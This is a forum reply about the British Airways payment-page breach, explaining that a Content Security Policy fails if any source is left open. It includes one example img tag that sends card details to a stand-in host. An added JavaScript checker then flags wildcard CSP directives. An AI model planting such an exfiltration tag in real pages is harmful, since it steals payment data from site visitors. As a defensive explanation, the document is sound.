Reply to post: Re: Possible mitigation?

British Airways hack: Infosec experts finger third-party scripts on payment pages

Brewster's Angle Grinder Silver badge

Re: Possible mitigation?

The CSP will do this for you already. But you have to lock everything down. If, for example, you allow images from anywhere then I can exfiltrate data by including the image:

<img src="http://example.com/save-hacked-details/?user=brewsters-angle-grinder&credit-card=1234-0000-8000-1234&">
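An added example, not part of the original comment: a small JavaScript check that parses a Content-Security-Policy header and reports which fetch directives still accept any host, which is the gap the image request above relies on. The function names and the sample policies are constructed for illustration.

```javascript
// Added example: list the CSP fetch directives that still allow requests
// to arbitrary hosts, which is the exfiltration path the comment describes.

// Directives that fall back directly to default-src when absent.
const FETCH_DIRECTIVES = ["img-src", "script-src", "style-src",
                          "connect-src", "font-src", "media-src"];

// Parse a policy string into a Map: directive name -> source expressions.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A repeated directive is ignored by browsers; the first one wins.
    if (!policy.has(name)) policy.set(name, tokens.slice(1));
  }
  return policy;
}

// True for a source that matches any host: "*" or a bare scheme ("https:").
function isWildcard(source) {
  return source === "*" || /^(https?|wss?):$/i.test(source);
}

// Return one finding per directive through which any host can be contacted.
function openChannels(header) {
  const policy = parseCsp(header);
  const findings = [];
  for (const directive of FETCH_DIRECTIVES) {
    const via = policy.has(directive) ? directive : "default-src";
    const sources = policy.get(via);
    if (sources === undefined) {
      findings.push(`${directive}: unrestricted (no ${directive} or default-src)`);
    } else if (sources.some(isWildcard)) {
      findings.push(`${directive}: any host allowed via ${via}`);
    }
  }
  return findings;
}

// Constructed sample policies, not taken from any real site.
const LOOSE = "default-src 'self'; img-src *; script-src 'self'";
const STRICT = "default-src 'none'; img-src 'self'; script-src 'self'";

console.log(openChannels(LOOSE));
console.log(openChannels(STRICT));
```

An empty result means none of the listed directives accepts an arbitrary host; it does not cover directives outside the list, such as form-action.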
